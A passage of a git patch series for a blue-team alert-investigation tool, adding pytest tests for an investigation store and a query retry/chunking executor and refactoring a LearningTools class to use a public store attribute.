1 + noisy_pattern = next((p for p in patterns if p["alert_name"] == "NoisyAlert"), None) + assert noisy_pattern is not None + assert noisy_pattern["occurrences"] >= 3 + + +class TestGlobalStore: + """Tests for global store functions.""" + + def test_get_investigation_store_creates_default(self) -> None: + """Test that get_investigation_store creates a default store.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store = get_investigation_store(db_path) + + assert store is not None + assert store.db_path == db_path + + reset_investigation_store() + + def test_get_investigation_store_returns_same_instance(self) -> None: + """Test that get_investigation_store returns the same instance.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store1 = get_investigation_store(db_path) + store2 = get_investigation_store() + + assert store1 is store2 + + reset_investigation_store() + + def test_reset_investigation_store(self) -> None: + """Test resetting the global store.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store1 = get_investigation_store(db_path) + reset_investigation_store() + + # After reset, a new call should create new instance + store2 = get_investigation_store(db_path) + + assert store1 is not store2 + + reset_investigation_store() + + +class TestSimilarityScoring: + """Tests for similarity calculation.""" + + def test_similarity_score_all_factors( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test similarity score with all matching factors.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_name=sample_investigation.alert_name, + alert_fingerprint=sample_investigation.alert_fingerprint, + technique_id=sample_investigation.technique_id, + severity=sample_investigation.severity, + ) + + assert len(similar) == 1 + # 0.5 (fingerprint) + 0.3 (name) + 0.15 (technique) + 0.05 (severity) = 1.0 + assert similar[0].similarity_score == 1.0 + assert len(similar[0].matching_factors) == 4 + + def test_similarity_score_partial_match( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test similarity score with partial match.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + technique_id=sample_investigation.technique_id, + ) + + assert len(similar) == 1 + assert similar[0].similarity_score == 0.15 + assert similar[0].matching_factors == ["same_technique"] diff --git a/tests/test_query_resilience.py b/tests/test_query_resilience.py new file mode 100644 index 00000000..2bd12438 --- /dev/null +++ b/tests/test_query_resilience.py @@ -0,0 +1,516 @@ +"""Tests for the Query Resilience module.""" + +import asyncio +from typing import Any +from unittest.mock import AsyncMock + +import pytest + +from ares.core.query_resilience import ( + QueryAttempt, + QueryResilientExecutor, + QueryStats, + get_resilient_executor, + reset_resilient_executor, +) + + +class TestQueryAttempt: + """Tests for QueryAttempt dataclass.""" + + def test_create_successful_attempt(self) -> None: + """Test creating a successful query attempt.""" + attempt = QueryAttempt( + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + attempt_number=1, + success=True, + result_count=100, + duration_ms=500, + ) + + assert attempt.success is True + assert attempt.error is None + assert attempt.result_count == 100 + + def test_create_failed_attempt(self) -> None: + """Test creating a failed query attempt.""" + attempt = QueryAttempt( + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + attempt_number=2, + success=False, + error="Timeout after 30s", + duration_ms=30000, + ) + + assert attempt.success is False + assert attempt.error == "Timeout after 30s" + assert attempt.result_count == 0 + + +class TestQueryStats: + """Tests for QueryStats dataclass.""" + + def test_default_values(self) -> None: + """Test default values for QueryStats.""" + stats = QueryStats() + + assert stats.total_attempts == 0 + assert stats.successful_attempts == 0 + assert stats.timeout_count == 0 + assert stats.retry_count == 0 + assert stats.time_range_reductions == 0 + assert stats.attempts == [] + + def test_success_rate_calculation(self) -> None: + """Test success rate calculation.""" + stats = QueryStats(total_attempts=10, successful_attempts=7) + + assert stats.success_rate == 0.7 + + def test_success_rate_zero_attempts(self) -> None: + """Test success rate with zero attempts.""" + stats = QueryStats(total_attempts=0, successful_attempts=0) + + assert stats.success_rate == 0.0 + + +class TestQueryResilientExecutor: + """Tests for QueryResilientExecutor.""" + + def test_init_default_values(self) -> None: + """Test default initialization values.""" + executor = QueryResilientExecutor() + + assert executor.max_retries == 3 + assert executor.initial_timeout == 30.0 + assert executor.enable_chunking is True + assert executor.chunk_size_minutes == 30 + + def test_init_custom_values(self) -> None: + """Test initialization with custom values.""" + executor = QueryResilientExecutor( + max_retries=5, + initial_timeout=60.0, + enable_chunking=False, + chunk_size_minutes=15, + ) + + assert executor.max_retries == 5 + assert executor.initial_timeout == 60.0 + assert executor.enable_chunking is False + assert executor.chunk_size_minutes == 15 + + @pytest.mark.asyncio + async def test_execute_with_resilience_success(self) -> None: + """Test successful query execution.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock( + return_value={ + "status": "success", + "data": {"result": [{"values": [[1, "log1"], [2, "log2"]]}]}, + } + ) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + assert result["status"] == "success" + assert "_resilience_metadata" in result + assert result["_resilience_metadata"]["retry_count"] == 0 + assert executor.stats.successful_attempts == 1 + + @pytest.mark.asyncio + async def test_execute_with_resilience_timeout_retry(self) -> None: + """Test retry behavior on timeout.""" + executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1) + + call_count = 0 + + async def timeout_then_success(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + if call_count < 2: + await asyncio.sleep(1) # Will timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=timeout_then_success) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + assert result["status"] == "success" + assert executor.stats.timeout_count >= 1 + + @pytest.mark.asyncio + async def test_execute_with_resilience_all_retries_fail(self) -> None: + """Test behavior when all retries fail.""" + executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1) + + async def always_timeout(**kwargs: Any) -> dict[str, Any]: + await asyncio.sleep(1) # Always timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=always_timeout) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + assert result["status"] == "error" + assert "suggestion" in result + assert executor.stats.timeout_count > 0 + + @pytest.mark.asyncio + async def test_execute_with_resilience_error_response(self) -> None: + """Test handling of error responses from query function.""" + executor = QueryResilientExecutor(max_retries=2) + + mock_query_fn = AsyncMock( + return_value={ + "status": "error", + "error": "timeout exceeded while executing query", + } + ) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Should retry on timeout errors + assert executor.stats.timeout_count > 0 + + @pytest.mark.asyncio + async def test_execute_with_resilience_time_range_reduction(self) -> None: + """Test time range reduction on persistent failures.""" + executor = QueryResilientExecutor(max_retries=1, initial_timeout=0.05) + + call_count = 0 + received_time_ranges: list[tuple[str, str]] = [] + + async def track_time_ranges(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + received_time_ranges.append((kwargs.get("start_time", ""), kwargs.get("end_time", ""))) + + # Fail first few, succeed later with smaller range + if call_count < 3: + await asyncio.sleep(1) # Timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=track_time_ranges) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + # Should have reduced time range at some point + assert executor.stats.time_range_reductions > 0 + + @pytest.mark.asyncio + async def test_execute_chunked_for_large_range(self) -> None: + """Test that large time ranges trigger chunked execution.""" + executor = QueryResilientExecutor(chunk_size_minutes=30) + + call_times: list[str] = [] + + async def track_chunks(**kwargs: Any) -> dict[str, Any]: + call_times.append(kwargs.get("start_time", "")) + return {"status": "success", "data": {"result": [{"values": [[1, "log"]]}]}} + + mock_query_fn = AsyncMock(side_effect=track_chunks) + + # 3 hour range should trigger chunking + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", + ) + + # Should have made multiple chunk calls (3 hours / 30 min = 6 chunks) + assert len(call_times) >= 4 + assert "_chunked_execution" in result + + @pytest.mark.asyncio + async def test_execute_chunked_disabled(self) -> None: + """Test that chunking can be disabled.""" + executor = QueryResilientExecutor(enable_chunking=False) + + call_count = 0 + + async def count_calls(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=count_calls) + + # 3 hour range but chunking disabled + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", + ) + + # Should have made only one call (not chunked) + assert call_count == 1 + + @pytest.mark.asyncio + async def test_execute_chunked_merge_results(self) -> None: + """Test that chunked results are properly merged.""" + executor = QueryResilientExecutor(chunk_size_minutes=30) + + chunk_num = 0 + + async def return_chunk_results(**kwargs: Any) -> dict[str, Any]: + nonlocal chunk_num + chunk_num += 1 + return { + "status": "success", + "data": {"result": [{"stream": {}, "values": [[chunk_num, f"log{chunk_num}"]]}]}, + } + + mock_query_fn = AsyncMock(side_effect=return_chunk_results) + + # Range > 2 hours triggers chunking (chunking threshold is > 2h) + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", # 3 hours = 6 chunks + ) + + # Results should be merged (6 chunks for 3 hours / 30 min) + assert "data" in result + assert len(result["data"]["result"]) >= 2 + + def test_count_results_list(self) -> None: + """Test counting results from a list.""" + executor = QueryResilientExecutor() + + result = [1, 2, 3, 4, 5] + count = executor._count_results(result) + + assert count == 5 + + def test_count_results_dict_with_streams(self) -> None: + """Test counting results from Loki-style response.""" + executor = QueryResilientExecutor() + + result = { + "data": { + "result": [ + {"stream": {}, "values": [[1, "a"], [2, "b"]]}, + {"stream": {}, "values": [[3, "c"]]}, + ] + } + } + count = executor._count_results(result) + + assert count == 3 # 2 + 1 values + + def test_count_results_empty(self) -> None: + """Test counting results from empty response.""" + executor = QueryResilientExecutor() + + assert executor._count_results({}) == 0 + assert executor._count_results({"data": {}}) == 0 + assert executor._count_results({"data": {"result": []}}) == 0 + + def test_get_stats_summary(self) -> None: + """Test getting stats summary.""" + executor = QueryResilientExecutor() + executor.stats.total_attempts = 10 + executor.stats.successful_attempts = 8 + executor.stats.timeout_count = 2 + executor.stats.retry_count = 3 + executor.stats.time_range_reductions = 1 + + summary = executor.get_stats_summary() + + assert summary["total_attempts"] == 10 + assert summary["successful_attempts"] == 8 + assert summary["success_rate"] == "80.0%" + assert summary["timeout_count"] == 2 + assert summary["retry_count"] == 3 + assert summary["time_range_reductions"] == 1 + + def test_merge_chunk_results_empty(self) -> None: + """Test merging empty chunk results.""" + executor = QueryResilientExecutor() + + result = executor._merge_chunk_results([]) + + assert result["status"] == "success" + assert result["data"]["result"] == [] + + def test_merge_chunk_results_multiple(self) -> None: + """Test merging multiple chunk results.""" + executor = QueryResilientExecutor() + + chunks = [ + {"data": {"result": [{"stream": "a", "values": [1, 2]}]}}, + {"data": {"result": [{"stream": "b", "values": [3, 4]}]}}, + {"data": {"result": [{"stream": "c", "values": [5]}]}}, + ] + + result = executor._merge_chunk_results(chunks) + + assert result["status"] == "success" + assert len(result["data"]["result"]) == 3 + + +class TestGlobalExecutor: + """Tests for global executor functions.""" + + def test_get_resilient_executor_creates_default(self) -> None: + """Test that get_resilient_executor creates a default instance.""" + reset_resilient_executor() + + executor = get_resilient_executor() + + assert executor is not None + assert isinstance(executor, QueryResilientExecutor) + + reset_resilient_executor() + + def test_get_resilient_executor_returns_same_instance(self) -> None: + """Test that get_resilient_executor returns the same instance.""" + reset_resilient_executor() + + executor1 = get_resilient_executor() + executor2 = get_resilient_executor() + + assert executor1 is executor2 + + reset_resilient_executor() + + def test_reset_resilient_executor(self) -> None: + """Test resetting the global executor.""" + reset_resilient_executor() + + executor1 = get_resilient_executor() + reset_resilient_executor() + executor2 = get_resilient_executor() + + assert executor1 is not executor2 + + reset_resilient_executor() + + +class TestTimeRangeFactors: + """Tests for time range reduction factors.""" + + def test_time_range_factors_order(self) -> None: + """Test that time range factors are in descending order.""" + factors = QueryResilientExecutor.TIME_RANGE_FACTORS + + assert factors == sorted(factors, reverse=True) + assert factors[0] == 1.0 # Start with full range + assert factors[-1] < 0.5 # End with small range + + def test_backoff_delays_order(self) -> None: + """Test that backoff delays are in ascending order.""" + delays = QueryResilientExecutor.BACKOFF_DELAYS + + assert delays == sorted(delays) + assert delays[0] >= 1 # At least 1 second + + +class TestEdgeCases: + """Tests for edge cases.""" + + @pytest.mark.asyncio + async def test_execute_with_z_suffix_timestamps(self) -> None: + """Test handling of Z suffix in timestamps.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}}) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + assert result["status"] == "success" + + @pytest.mark.asyncio + async def test_execute_with_offset_timestamps(self) -> None: + """Test handling of offset timestamps.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock(return_value={"status": "success", "data": {"result": []}}) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00+00:00", + end_time="2024-01-15T11:00:00+00:00", + ) + + assert result["status"] == "success" + + @pytest.mark.asyncio + async def test_execute_with_grpc_error(self) -> None: + """Test handling of gRPC errors.""" + executor = QueryResilientExecutor(max_retries=3) + + mock_query_fn = AsyncMock(side_effect=Exception("grpc: connection failed")) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Should give up on gRPC errors and move to next time range factor + assert result["status"] == "error" + + @pytest.mark.asyncio + async def test_execute_with_non_timeout_error_response(self) -> None: + """Test handling of non-timeout error responses.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock( + return_value={ + "status": "error", + "error": "invalid query syntax", + } + ) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Non-timeout errors should be returned (not retried indefinitely) + # The result might still have metadata + assert executor.stats.timeout_count == 0 From 628b46884bb80c9d8547967a78b03ab4f8726d85 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Sat, 10 Jan 2026 18:06:30 -0700 Subject: [PATCH 5/5] refactor: simplify LearningTools store handling and update tests **Changed:** - Refactored LearningTools to use a public `store` attribute instead of a private `_store` with property logic, simplifying initialization and access - Replaced all direct store accesses with a `get_store()` method to ensure store is initialized when needed - Updated tests to use the public `store` attribute and `get_store()` method, reflecting the new initialization and access pattern - Improved class and attribute documentation for clarity --- src/ares/tools/blue/learning.py | 32 ++++++++++++++------------------ tests/test_learning.py | 12 ++++++------ 2 files changed, 20 insertions(+), 24 deletions(-) diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py index 38a8fb40..accc04d9 100644 --- a/src/ares/tools/blue/learning.py +++ b/src/ares/tools/blue/learning.py @@ -19,22 +19,18 @@ class LearningTools(Toolset): # type: ignore[misc] Provides access to historical investigation data, query effectiveness statistics, and false positive patterns. - """ - def __init__(self, store: InvestigationStore | None = None): - """Initialize learning tools. + Attributes: + store: Optional investigation store (uses global store if not provided). + """ - Args: - store: Optional investigation store (uses global store if not provided) - """ - self._store = store + store: InvestigationStore | None = None - @property - def store(self) -> InvestigationStore: - """Get the investigation store.""" - if self._store is None: - self._store = get_investigation_store() - return self._store + def get_store(self) -> InvestigationStore: + """Get the investigation store, initializing if needed.""" + if self.store is None: + self.store = get_investigation_store() + return self.store @dn.tool_method # type: ignore[untyped-decorator] async def find_similar_investigations( @@ -63,7 +59,7 @@ async def find_similar_investigations( f"Looking up similar investigations: alert={alert_name}, technique={technique_id}" ) - similar = self.store.find_similar_investigations( + similar = self.get_store().find_similar_investigations( alert_name=alert_name, technique_id=technique_id, severity=severity, @@ -140,7 +136,7 @@ async def get_effective_queries( dn.log_metric("learning_query_lookup", 1, mode="count") logger.info(f"Looking up effective queries for alert: {alert_name}") - effective = self.store.get_effective_queries( + effective = self.get_store().get_effective_queries( alert_type=alert_name, min_evidence_rate=0.2, # At least 20% evidence rate limit=limit, @@ -198,7 +194,7 @@ async def check_false_positive_pattern( logger.info(f"Checking false positive patterns for: {alert_name}") # Check for similar false positives - similar = self.store.find_similar_investigations( + similar = self.get_store().find_similar_investigations( alert_name=alert_name, alert_fingerprint=alert_fingerprint, limit=20, @@ -223,7 +219,7 @@ async def check_false_positive_pattern( fp_rate = 0.0 # Check known FP patterns - fp_patterns = self.store.get_false_positive_patterns(min_occurrences=2) + fp_patterns = self.get_store().get_false_positive_patterns(min_occurrences=2) matching_pattern = None for pattern in fp_patterns: if pattern["alert_name"] == alert_name: @@ -278,7 +274,7 @@ async def get_investigation_statistics(self) -> dict[str, Any]: """ dn.log_metric("learning_stats_lookup", 1, mode="count") - stats = self.store.get_statistics() + stats = self.get_store().get_statistics() return { "total_investigations": stats["total_investigations"], diff --git a/tests/test_learning.py b/tests/test_learning.py index f515ed6a..7262e8e4 100644 --- a/tests/test_learning.py +++ b/tests/test_learning.py @@ -115,21 +115,21 @@ def test_init_with_store(self, store: InvestigationStore) -> None: """Test initialization with provided store.""" tools = LearningTools(store=store) - assert tools._store is store + assert tools.store is store def test_init_without_store(self) -> None: """Test initialization without store uses global.""" tools = LearningTools() - assert tools._store is None - # Accessing store property should get/create global store + assert tools.store is None + # Accessing get_store() should get/create global store # (but we won't test that to avoid side effects) - def test_store_property_returns_provided_store(self, store: InvestigationStore) -> None: - """Test that store property returns provided store.""" + def test_get_store_returns_provided_store(self, store: InvestigationStore) -> None: + """Test that get_store() returns provided store.""" tools = LearningTools(store=store) - assert tools.store is store + assert tools.get_store() is store class TestFindSimilarInvestigations: